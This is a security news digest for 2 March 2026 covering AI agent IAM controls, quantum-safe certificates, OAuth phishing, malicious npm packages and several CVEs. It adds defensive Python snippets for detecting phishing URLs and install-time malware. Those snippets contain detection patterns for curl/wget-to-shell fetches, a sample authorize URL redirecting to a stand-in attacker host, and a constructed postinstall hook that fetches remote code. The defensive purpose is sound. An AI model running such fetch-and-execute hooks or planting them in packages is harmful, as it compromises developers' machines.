
AI Agent Controls, Quantum-Safe HTTPS, and Evolving Threats
Coverage: 02 Mar 2026 (UTC)
As organizations operationalize AI and retool networks, AWS introduced standardized IAM context keys to govern agentic access to cloud resources. In parallel, the Chrome team outlined an overhaul of web certificates toward Merkle Tree Certificates to enable quantum‑resistant HTTPS without heavy performance costs, as reported by The Hacker News. Together these moves concentrate on stronger boundaries, cleaner audit trails, and compatibility with existing deployments.
Governing AI Agents and Programmable Networks
AWS is standardizing how AI agents act on behalf of customers by adding two IAM context keys for its managed Model Context Protocol servers: aws:ViaAWSMCPService indicates requests routed through an AWS‑managed MCP, and aws:CalledViaAWSMCP holds the MCP service principal. Administrators can reference these keys in IAM and SCP policies to enforce differentiated controls, for example denying deletes when traffic originates from an MCP, or allowing EKS operations only via the EKS MCP server. AWS also plans to simplify public endpoint authorization so MCP servers add the new context while downstream services authorize with existing SigV4 credentials, removing separate MCP‑specific actions. For regulated environments, planned VPC endpoint support would keep MCP traffic private and enable layered checks (network plus service policies) with CloudTrail auditability. The guidance emphasizes starting from least privilege, monitoring agent behavior in CloudTrail, and refining policies iteratively to balance function and risk.
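To show how the two context keys gate a statement, here is an added example (not AWS code or documentation): two policy statements in the shape described above plus a deliberately simplified evaluator. It assumes aws:ViaAWSMCPService is exposed as a Bool and aws:CalledViaAWSMCP as a service-principal string; the EKS MCP principal name is a placeholder.

```python
# Added example, not AWS code: a simplified evaluator showing how the two
# MCP context keys gate an IAM/SCP statement. Assumptions: the keys are
# exposed as a Bool ("true") and a service-principal string; the EKS MCP
# principal name is a placeholder.
EKS_MCP_PRINCIPAL = "eks-mcp.amazonaws.com"  # placeholder, not a confirmed AWS name

# Deny destructive S3 actions whenever the request arrived through an MCP server.
DENY_DELETES_VIA_MCP = {
    "Effect": "Deny",
    "Action": ["s3:DeleteObject", "s3:DeleteBucket"],
    "Resource": "*",
    "Condition": {"Bool": {"aws:ViaAWSMCPService": "true"}},
}

# Allow EKS calls only when the request came through the EKS MCP server.
ALLOW_EKS_ONLY_VIA_EKS_MCP = {
    "Effect": "Allow",
    "Action": ["eks:*"],
    "Resource": "*",
    "Condition": {"StringEquals": {"aws:CalledViaAWSMCP": EKS_MCP_PRINCIPAL}},
}

def _action_matches(pattern: str, action: str) -> bool:
    svc, _, op = pattern.partition(":")
    asvc, _, aop = action.partition(":")
    return svc == asvc and (op == "*" or op == aop)

def _condition_holds(cond: dict, ctx: dict) -> bool:
    # A missing context key makes the condition false, as in IAM.
    for op, pairs in cond.items():
        for key, want in pairs.items():
            have = ctx.get(key)
            if op == "Bool" and str(have).lower() != want:
                return False
            if op == "StringEquals" and have != want:
                return False
    return True

def evaluate(statements: list, action: str, ctx: dict) -> str:
    """Simplified IAM logic: explicit Deny wins, then Allow, else implicit deny."""
    decision = "ImplicitDeny"
    for st in statements:
        if not any(_action_matches(p, action) for p in st["Action"]):
            continue
        if not _condition_holds(st.get("Condition", {}), ctx):
            continue
        if st["Effect"] == "Deny":
            return "Deny"
        decision = "Allow"
    return decision
```

The evaluator ignores resource matching and the rest of IAM's evaluation chain; it exists only to make the effect of the two condition keys visible.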
On the network edge, Cloudflare is pushing beyond configuration APIs to inline programmability: administrators can run Workers as part of policy evaluation to call external risk engines, inject identity‑aware headers, or route traffic with custom logic in milliseconds, all on the same global network that powers its SASE stack. The company positions this as turning bespoke integrations into durable capabilities rather than professional‑services projects, and it plans managed and custom Gateway actions through 2026 to formalize the model. Details are in Cloudflare's announcement and in Project Helix, an onboarding acceleration project that codifies best‑practice Zero Trust templates to eliminate blank‑slate deployments and get advanced controls (TLS inspection, DLP, AV scanning, device posture, RBI, and SaaS tenant restrictions) into production within minutes.
In telecom, Google Cloud described an agentic path to autonomous networks at MWC Barcelona, built on a temporal network digital twin, a unified graph layer (Spanner Graph and BigQuery), and integrated ML via Vertex AI. Operators can train GNNs on twin data, use Spanner’s ML.PREDICT to anticipate failure propagation, and act before subscribers are impacted. Open‑sourced pipelines, proof‑of‑value agents for governance and remediation, and ecosystem pilots aim to shorten time‑to‑value for CSPs by collapsing silos and enabling real‑time alarm correlation, historical state queries, and predictive modeling.
Quantum‑Ready PKI and Browser Safeguards
The Chrome team’s move toward Merkle Tree Certificates (MTCs) replaces large, per‑certificate signatures with compact inclusion proofs anchored by a single CA‑signed tree head. That design cuts authentication data exchanged in TLS to the minimum and bakes transparency into issuance, preserving low latency while supporting stronger, post‑quantum algorithms. Google is testing MTCs with Cloudflare and outlined a phased path, including onboarding criteria for a Chrome Quantum‑resistant Root Store. For operators, the appeal is efficiency and a clearer governance model without sacrificing web performance.
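The inclusion-proof mechanism that lets MTCs replace per-certificate signatures, as an added illustration (not the MTC draft's exact encoding and not Google's or Cloudflare's code): the CA signs only the tree head, simulated here with an HMAC under a constructed key, and each certificate carries a short proof of log(n) sibling hashes.

```python
# Added illustration of the Merkle inclusion-proof mechanism behind MTCs; not
# the draft's exact encoding. The CA signs only the tree head (simulated here
# with HMAC under a constructed key); each certificate carries a short proof.
import hashlib
import hmac

CA_KEY = b"constructed-placeholder-ca-key"  # stands in for the CA's signing key

def _leaf(data: bytes) -> bytes:
    return hashlib.sha256(b"\x00" + data).digest()   # domain-separated leaf hash

def _node(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()

def _padded(level: list) -> list:
    return level + [level[-1]] if len(level) % 2 else level  # duplicate odd tail

def build_tree(certs: list) -> list:
    """Returns levels[0] = leaf hashes ... levels[-1] = [root]."""
    level = [_leaf(c) for c in certs]
    levels = [level]
    while len(level) > 1:
        p = _padded(level)
        level = [_node(p[i], p[i + 1]) for i in range(0, len(p), 2)]
        levels.append(level)
    return levels

def inclusion_proof(levels: list, index: int) -> list:
    """Sibling hashes from leaf to root; the flag says the sibling is on the right."""
    proof = []
    for level in levels[:-1]:
        p = _padded(level)
        sib = index ^ 1
        proof.append((p[sib], sib > index))
        index //= 2
    return proof

def verify_inclusion(cert: bytes, proof: list, root: bytes) -> bool:
    h = _leaf(cert)
    for sibling, on_right in proof:
        h = _node(h, sibling) if on_right else _node(sibling, h)
    return hmac.compare_digest(h, root)

def sign_head(root: bytes) -> bytes:
    return hmac.new(CA_KEY, root, hashlib.sha256).digest()

def verify_head(root: bytes, sig: bytes) -> bool:
    return hmac.compare_digest(sign_head(root), sig)
```

A relying party checks the head signature once and then each certificate's proof against that head, which is why the per-connection authentication data stays small even when the head signature uses a large post-quantum scheme.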
Separately, researchers at Palo Alto Networks uncovered CVE‑2026‑0628 in Chrome's Gemini Live side panel that let extensions using declarativeNetRequest intercept and modify the app inside a privileged browser component. Exploitation enabled access to camera and microphone, local files, screenshots, and phishing content within trusted UI. Google reproduced the issue and shipped a fix in early January 2026. The advisory situates the flaw within broader agentic‑browser risks where multimodal access expands the attack surface; details are in Unit 42's advisory. The immediate takeaway: keep browsers updated and scrutinize extension permissions even when declared scopes appear limited.
Kaspersky reported CVE‑2026‑3102 in ExifTool on macOS, where crafted metadata (for example, DateTimeOriginal with embedded shell commands) can trigger code execution when ExifTool runs with the -n/--printConv flag. Because ExifTool is frequently embedded in photo apps and automation, unattended processing of untrusted images can compromise hosts. The maintainer released ExifTool 13.50 to remediate the issue; organizations should update bundled copies, isolate media pipelines, and restrict network/storage access around processing nodes. Full guidance is in Kaspersky.
Abuse of Trust Flows and Developer Ecosystems
Microsoft detailed phishing operations exploiting legitimate OAuth redirection behavior to bypass email and browser defenses. Attackers sent authorization links (via email, PDFs, calendar invites) that initiated silent probes with parameters like prompt=none and invalid scopes; standards‑compliant error handling then redirected to attacker‑controlled URIs, delivering phishing pages, proxy frameworks, or ZIP payloads. Chains used HTML smuggling, .LNKs launching PowerShell, and DLL side‑loading to establish C2. Microsoft Entra disabled malicious apps and Defender surfaced detections across email, identity, and endpoint. Recommended mitigations: govern OAuth apps and consent, enforce Conditional Access, enable XDR correlation, and hunt for auth URLs with silent prompts, invalid scopes, or state values encoding emails. See Microsoft for indicators and hunting tips. Why it matters: adversaries are increasingly turning protocol edges and trust relationships into delivery paths as credential theft becomes harder.
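The hunting markers listed above (silent prompts, invalid scopes, state values encoding emails, off-tenant redirect URIs) as added detection logic over constructed sample URLs; this is not Microsoft's hunting query, and the known-scope set and allowed redirect hosts are assumptions a tenant would replace with its own inventory.

```python
# Added detection logic, not Microsoft's hunting query: flags authorize URLs
# carrying the markers the report lists. Sample URLs are constructed; the
# known-scope set and allowed redirect hosts are assumptions a tenant
# replaces with its own inventory.
import base64
import re
from urllib.parse import parse_qs, urlparse

KNOWN_SCOPES = {"openid", "profile", "email", "offline_access", "user.read"}
ALLOWED_REDIRECT_HOSTS = {"app.example.com"}  # assumption: the tenant's own apps
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def _b64_text(value: str) -> str:
    """Best-effort decode of a base64url state value; empty string on failure."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.urlsafe_b64decode(padded).decode("utf-8", "ignore")
    except (ValueError, TypeError):
        return ""

def suspicious_markers(url: str) -> list:
    """Returns the marker names found in an OAuth authorize URL (empty if clean)."""
    u = urlparse(url)
    if "/oauth2/" not in u.path or not u.path.endswith("/authorize"):
        return []
    q = {k: v[0] for k, v in parse_qs(u.query).items()}
    hits = []
    if q.get("prompt") == "none":                      # silent probe
        hits.append("silent_prompt")
    if set(q.get("scope", "").lower().split()) - KNOWN_SCOPES:
        hits.append("unknown_scope")                   # forces an error redirect
    host = urlparse(q.get("redirect_uri", "")).hostname or ""
    if host and host not in ALLOWED_REDIRECT_HOSTS:
        hits.append("unlisted_redirect_uri")
    state = q.get("state", "")
    if EMAIL_RE.search(state) or EMAIL_RE.search(_b64_text(state)):
        hits.append("email_in_state")                  # victim tracking
    return hits

SAMPLE_STATE = base64.urlsafe_b64encode(b"victim@example.com").decode()
SAMPLE_URLS = [  # constructed, not real indicators
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=1"
    "&response_type=code&prompt=none&scope=openid%20xxx.invalid"
    "&redirect_uri=https%3A%2F%2Fattacker.example.net%2Fcb&state=" + SAMPLE_STATE,
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=1"
    "&response_type=code&scope=openid%20profile"
    "&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&state=abc123",
]
```

Run it over URLs extracted from mail, proxy, or identity logs; a hit on more than one marker is a strong signal, while a single unknown scope on its own is often just a misconfigured app.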
In the software supply chain, researchers tied a wave of 26 malicious npm packages to North Korean actors, who used install‑time scripts and character‑level steganography in public Pastebin pastes to assemble C2 domains. Staging leveraged Vercel deployments and delivered a cross‑platform RAT with modules for persistence via VS Code, keylogging, clipboard theft, browser and wallet credential harvesting (including macOS iCloud Keychain), filesystem discovery, targeted file exfiltration, Git/.ssh theft, and WebSocket‑based control. The campaign shows refined evasion using legitimate clouds and multi‑stage loaders. Developers should audit install scripts, remove the identified packages, and tighten review processes for typosquats and post‑install behavior. Coverage appears in The Hacker News.
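A starting point for the install-script audit recommended above, as an added helper (not the researchers' tooling): it scans package.json manifests for install-time hooks that reference paste sites, Vercel-hosted staging, remote fetches, or inline evaluation. The manifests and indicator list are constructed assumptions drawn from the behaviours the report describes, not real packages or confirmed IoCs.

```python
# Added audit helper, not the researchers' tooling: flags install-time hooks in
# package.json manifests showing the behaviours the report describes. The
# manifests and indicator list are constructed assumptions, not real packages.
import json
import re

HOOKS = ("preinstall", "install", "postinstall", "prepare")
INDICATORS = {
    "paste_site": re.compile(r"pastebin\.com", re.I),
    "vercel_staging": re.compile(r"\.vercel\.app\b", re.I),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\(|child_process", re.I),
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b|https?://", re.I),
}

def audit_manifest(manifest: dict) -> dict:
    """Returns {hook: [indicator names]} for each install hook that trips a rule."""
    findings = {}
    for hook in HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings

def audit_tree(node_modules: dict) -> dict:
    """node_modules maps package name -> package.json text; returns only offenders."""
    report = {}
    for name, text in node_modules.items():
        findings = audit_manifest(json.loads(text))
        if findings:
            report[name] = findings
    return report

SAMPLE_TREE = {  # constructed manifests
    "harmless-util": json.dumps({"name": "harmless-util",
                                 "scripts": {"test": "node test.js"}}),
    "looks-legit": json.dumps({"name": "looks-legit", "scripts": {
        "postinstall": "node -e \"require('https').get('https://pastebin.com/raw/PLACEHOLDER')\""}}),
}
```

Running the audit with `npm install --ignore-scripts` first, then reviewing the report before allowing hooks to execute, keeps the scan itself from triggering the payloads it is looking for.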
Regional Escalation and Service Disruption
Following coordinated Israeli–US strikes on Iranian targets, reporting points to a surge in cyber activity, with sources citing Iran’s internet connectivity dropping to roughly 4% of normal and a flood of DDoS, defacements, and unverified breach claims attributed to multiple hacktivist and aligned groups. The UK’s NCSC assessed no immediate change to the direct threat to the UK but urged organizations with operations or supply‑chain exposure in the region to review posture. Recommended steps include heightened monitoring and logging, enforcing MFA, verified offline backups, and readiness checks for critical infrastructure contingency plans. Summary and context are in Infosecurity. Why it matters: geopolitical events can amplify indirect risk through third‑party and regional dependencies.
Anthropic confirmed a global service disruption for its Claude AI across web, mobile, and API, reporting elevated errors and ongoing investigation. The outage affects production workflows and conversational interfaces relying on real‑time responses. Teams should monitor error rates, implement exponential backoff and retries, consider temporary rate‑limits or cached responses, and evaluate alternate models where continuity is critical, while tracking official status updates. Coverage is available via BleepingComputer.